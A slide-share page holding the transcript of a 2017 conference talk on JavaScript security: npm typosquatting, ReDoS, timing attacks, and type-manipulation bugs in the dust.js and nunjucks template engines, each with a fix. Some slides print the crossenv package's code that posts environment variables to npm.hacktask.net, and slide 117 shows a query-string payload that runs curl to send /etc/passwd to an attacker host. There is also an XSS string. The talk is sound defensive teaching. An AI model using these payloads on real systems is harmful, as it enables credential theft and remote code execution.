Upgrade to Pro — share decks privately, control downloads, hide ads and more …

JavaScript Exposed at Midwest JS

Tim Kadlec
August 17, 2017
Technology
3
280

JavaScript Exposed at Midwest JS

Thanks to the a vibrant ecosystem and server-side runtimes like Node.js, our sites and applications are using more JavaScript than ever before. With so much JavaScript tied to critical functionality, understanding the security implications of that JavaScript is absolutely crucial so that we're not leaving our businesses, and our users, exposed.

In this talk, we'll go through some of the more interesting security JavaScript vulnerabilities so that we can see how they work, what they can impact, and most importantly, how to fix them.

Presented at MidwestJS in Minneapolis on August 17, 2017.

Tim Kadlec

August 17, 2017
Tweet

More Decks by Tim Kadlec

See All by Tim Kadlec
The State of Node.js Security, at Node.js Interactive 2017
tkadlec
1
370
Focusing On What Matters, at Fluent, 2017
tkadlec
0
140
Once More, With Feeling at Code 2016 in Sydney
tkadlec
1
670
Once More, With Feeling
tkadlec
9
1.7k
Mobile Image Processing at London Web Perf Meetup, 2016
tkadlec
1
200
Better By Proxy at Velocity NY 2015
tkadlec
3
670
Getting Started with Performance Budgets at HighEdWeb Technical Academy, 2015
tkadlec
9
1.2k
Reaching Everyone, Fast at From the Front, 2015
tkadlec
8
7.1k
Better by Proxy at Smashing Conf NY
tkadlec
2
860

Other Decks in Technology

See All in Technology
Dataverseの検索列について
miyakemito
1
150
Notion x ポストモーテムで広げる組織の学び / Notion x Postmortem
isaoshimizu
1
130
AWS全冠芸人が見た世界 ~資格取得より大切なこと~
masakiokuda
6
6.5k
PostgreSQL Log File Mastery: Optimizing Database Performance Through Advanced Log Analysis
shiviyer007
PRO
1
140
ガバクラのAWS長期継続割引 ~次の4/1に慌てないために~
hamijay_cloud
1
540
フルカイテン株式会社 エンジニア向け採用資料
fullkaiten
0
5.4k
Microsoft の SSE の現在地
skmkzyk
0
250
テストって楽しい!開発を加速させるテストの魅力 / Testing is Fun! The Fascinating of Testing to Accelerate Development
aiandrox
0
140
CodeRabbitと過ごした1ヶ月 ─ AIコードレビュー導入で実感したチーム開発の進化
mitohato14
0
180
10ヶ月かけてstyled-components v4からv5にアップデートした話
uhyo
5
440
より良い開発者体験を実現するために~開発初心者が感じた生成AIの可能性~
masakiokuda
0
220
ここはMCPの夜明けまえ
nwiizo
32
12k

Featured

See All Featured
Bash Introduction
62gerente
611
210k
Building Applications with DynamoDB
mza
94
6.4k
Why You Should Never Use an ORM
jnunemaker
PRO
56
9.3k
Music & Morning Musume
bryan
47
6.5k
Large-scale JavaScript Application Architecture
addyosmani
512
110k
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
47
2.7k
The Power of CSS Pseudo Elements
geoffreycrofte
75
5.8k
Building a Scalable Design System with Sketch
lauravandoore
462
33k
Thoughts on Productivity
jonyablonski
69
4.6k
Facilitating Awesome Meetings
lara
54
6.3k
Keith and Marios Guide to Fast Websites
keithpitt
411
22k
No one is an island. Learnings from fostering a developers community.
thoeni
21
3.2k

Transcript

  1. JAVASCRIPT EXPOSED Tim Kadlec | @tkadlec

  2. None

  3. TYPOSQUATTING

  4. None

  5. { "name": "crossenv", "version": "6.1.1", "description": "Run scripts that set

    and use environment variables across platforms", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1", "postinstall": "node package-setup.js" }, "author": "Kent C. Dodds <kent@doddsfamily.us> (http://kentcdodds.com/)", "license": "ISC", "dependencies": { "cross-env": "^5.0.1" } }

  6. { "name": "crossenv", "version": "6.1.1", "description": "Run scripts that set

    and use environment variables across platforms", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1", "postinstall": "node package-setup.js" }, "author": "Kent C. Dodds <kent@doddsfamily.us> (http://kentcdodds.com/)", "license": "ISC", "dependencies": { "cross-env": "^5.0.1" } }

  7. const host = 'npm.hacktask.net'; const env = JSON.stringify(process.env); const data

    = new Buffer(env).toString('base64'); const postData = querystring.stringify({ data }); const options = { hostname: host, port: 80, path: '/log', method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': Buffer.byteLength(postData); } }; const req = http.request(options); req.write(postData); req.end();

  8. const host = 'npm.hacktask.net'; const env = JSON.stringify(process.env); const data

    = new Buffer(env).toString('base64'); const postData = querystring.stringify({ data }); const options = { hostname: host, port: 80, path: '/log', method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': Buffer.byteLength(postData); } }; const req = http.request(options); req.write(postData); req.end();

  9. const host = 'npm.hacktask.net'; const env = JSON.stringify(process.env); const data

    = new Buffer(env).toString('base64'); const postData = querystring.stringify({ data }); const options = { hostname: host, port: 80, path: '/log', method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': Buffer.byteLength(postData); } }; const req = http.request(options); req.write(postData); req.end();
  10. None
  11. None
  12. None
  13. None

  14. CAN YOU TRUST THIRD-PARTY CODE?

  15. THE RISK OF ABSTRACTIONS

  16. ~83% FIND A VULNERABILITY

  17. None

  18. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send();

  19. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send(); }

  20. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send(); }

  21. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send(); }

  22. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send(); }

  23. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send(); }

  24. $.getJSON('/my/url', {}) .done(function(){ // Success! }) .fail(function(){ // Error! });

  25. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send(); }

  26. $.getJSON('/my/url', {}) .done(function(){ // Success! }) .fail(function(){ // Error! });

  27. $.get('/my/url', {});

  28. JS fatigue

  29. JS fatigue

  30. JS fatigue

  31. CAN YOU TRUST THIRD-PARTY CODE?

  32. CAN YOU TRUST CODE?

  33. None

  34. HACKED WILL BE HACKED

  35. HACKED WILL BE HACKED

  36. 20-30 bugs per 1,000 lines of code

  37. 77% USE A VULNERABLE JS LIBRARY

  38. NOT GREAT BUT FIXABLE

  39. EVERYONE’S RESPONSIBILITY

  40. WEAKNESSES IN THE LANGUAGE & ECOSYSTEM

  41. THE EVENT LOOP

  42. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second();

  43. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second();

  44. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second(); second()

  45. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second(); second()

  46. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second(); second() first()

  47. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second(); second() first()

  48. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second(); second()

  49. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second(); second()

  50. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second();

  51. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second();

  52. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second();

  53. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second()

  54. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second()

  55. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() setTimeout()

  56. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() 0ms, console.log

  57. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() console.log

  58. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() console.log

  59. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() first() console.log

  60. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() first() console.log

  61. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() console.log

  62. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() console.log

  63. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); console.log

  64. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); console.log

  65. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); console.log

  66. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second();
  67. None

  68. ReDoS REGULAR EXPRESSION DENIAL OF SERVICE

  69. var regex = /A(B|C+)+D/;

  70. var regex = /A(B|C+)+D/; A

  71. var regex = /A(B|C+)+D/; (B|C+)

  72. var regex = /A(B|C+)+D/; +

  73. var regex = /A(B|C+)+D/; D

  74. var regex = /A(B|C+)+D/; ABBD ABCCCCD ABCBCCCD ACCCCCD

  75. None
  76. None
  77. None
  78. None

  79. ACCCX CCC CC+C C+CC C+C+C var regex = /A(B|C+)+D/;

  80. String Number of C’s Number of Steps ACCCX 3 38

    ACCCCX 4 71 ACCCCCX 5 136 ACCCCCCCCCCCCCCX 14 65,553
  81. None

  82. moment().format('MMM Do YY');

  83. moment().format('MMM Do YY'); var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s+) +MMMM?/;

  84. moment().format('MMM Do YY'); var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s+) +MMMM?/; \s+)

  85. m().format("D MMN MMMM"); var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s+) +MMMM?/;

  86. var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s+) +MMMM?/;

  87. var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s +)MMMM?/;

  88. None

  89. TIMING ATTACK

  90. function isAdminToken(token) { var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a- e6d0ddb8bbba"; if (token

    == ADMIN_UUID) { return true; } return false; }

  91. function isAdminToken(token) { var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a- e6d0ddb8bbba"; if (token

    == ADMIN_UUID) { return true; } return false; } token == ADMIN_UUID

  92. foo == bar

  93. foo == bar f b

  94. foo == fox

  95. foo == fox f f

  96. foo == fox fo fo

  97. foo == fox foo fox

  98. function isAdminToken(token) { var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a- e6d0ddb8bbba"; if (token

    == ADMIN_UUID) { return true; } return false; }

  99. function isAdminToken(token) { var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a- e6d0ddb8bbba"; var mismatch

    = 0; for (var i = 0; i < token.length; ++i) { mismatch |= (token.charCodeAt(i) ^ ADMIN_UUID.charCodeAt(i)); } return mismatch; }

  100. DYNAMIC TYPING

  101. var foo = true; foo = 1; foo = "hotdogs";

  102. TYPE MANIPULATION

  103. None

  104. {@if cond="'{device}' == 'desktop'"} <div>Desktop version</div> {:else} <div>Mobile Version</div> {/if}

  105. "if": function( chunk, context, bodies, params ){ ... var cond

    = params.cond; cond = dust.helpers.tap(cond, chunk, context); // eval expressions with given dust references if(eval(cond)){ ... } }

  106. NEVER TRUST USER INPUT

  107. dust.escapeHtml = function(s) { if (typeof s === 'string') {

    if (!HCHARS.test(s)) { return s; } return s.replace(AMP,'&amp;').replace(...) // more char replacements } return s; }

  108. dust.escapeHtml = function(s) { if (typeof s === 'string') {

    if (!HCHARS.test(s)) { return s; } return s.replace(AMP,'&amp;').replace(...) // more char replacements } return s; }
  109. None

  110. qs.parse('a'); // {a : ''}

  111. qs.parse('a'); // {a : ''} qs.parse('a=foo'); // {a : 'foo'}

  112. qs.parse('a'); // {a : ''} qs.parse('a=foo'); // {a : 'foo'}

    qs.parse('a=foo&b=bar'); // {a : 'foo', b: ‘bar'}

  113. qs.parse('a'); // {a : ''} qs.parse('a=foo'); // {a : 'foo'}

    qs.parse('a=foo&b=bar'); // {a : 'foo', b: ‘bar'} qs.parse('a=foo&a=bar'); // {a : ['foo', 'bar']}

  114. qs.parse('a'); // {a : ''} qs.parse('a=foo'); // {a : 'foo'}

    qs.parse('a=foo&b=bar'); // {a : 'foo', b: ‘bar'} qs.parse('a=foo&a=bar'); // {a : ['foo', 'bar']} qs.parse('a[]=foo'); // {a : ['foo']}

  115. https://host/demo?device[]=&device[]=

  116. https://host/demo?device[]=&device[]= { device: [ '', '' ] }

  117. https://host/demo?device[]=x&device[]=y'- require('child_process').exec(‘curl+-F +"x=`cat+/etc/passwd`"+artsploit.com')-' eval("'xy'- require('child_process').exec('curl -F \"x=`cat /etc/passwd`\" attacker.com')-'' ==

    'desktop'");

  118. DISALLOW DISALLOW NON-STRING PARAMETERS

  119. NORMALIZE CONVERT TO SINGLE INPUT TYPE

  120. CUSTOM HANDLING SPECIFIC HANDLING FOR ALLOWED TYPES

  121. dust.escapeHtml = function(s) { if (typeof s === 'string') {

    if (!HCHARS.test(s)) { return s; } return s.replace(AMP,'&amp;').replace(...) // more char replacements } return s; }

  122. dust.escapeHtml = function(s) { if (typeof s === "string" ||

    (s && typeof s.toString === "function")) { if (typeof s !== "string") { s = s.toString(); } if (!HCHARS.test(s)) { return s; } } };
  123. None

  124. nunjucks.renderString( 'Hello ', {username: ‘<script>alert(1)</script>' });

  125. nunjucks.renderString( 'Hello ', {username: ‘<script>alert(1)</script>' }); Hello &lt;script&gt;alert(1)&lt;script&gt;

  126. escape: function(str) { if(typeof str === 'string') { return r.markSafe(lib.escape(str));

    } return str; }

  127. escape: function(str) { if(typeof str === 'string') { return r.markSafe(lib.escape(str));

    } return str; }

  128. http://host/?username[]=<script>alert(1)</ script>matt nunjucks.renderString( 'Hello ', {username: ['<script>alert(1)</ script>matt'] });

  129. if(autoescape && !(val instanceof SafeString)) { val = lib.escape(val.toString()); }

  130. KNOW WHAT HAPPENS UNDER THE HOOD

  131. FOUNDATIONAL KNOWLEDGE & CREATIVITY

  132. NOT GREAT BUT FIXABLE

  133. THANK YOU Tim Kadlec | @tkadlec